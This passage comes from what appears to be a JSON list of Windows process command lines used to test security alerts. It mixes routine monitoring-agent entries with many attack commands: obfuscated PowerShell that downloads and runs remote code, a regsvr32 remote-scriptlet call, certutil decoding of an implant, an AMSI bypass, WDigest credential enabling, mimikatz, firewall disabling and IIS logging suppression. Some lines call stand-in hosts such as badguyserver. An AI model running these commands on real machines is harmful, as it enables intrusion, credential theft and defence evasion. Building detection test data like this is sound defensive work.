/delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe k111\",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe -b -t -m\",\"cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 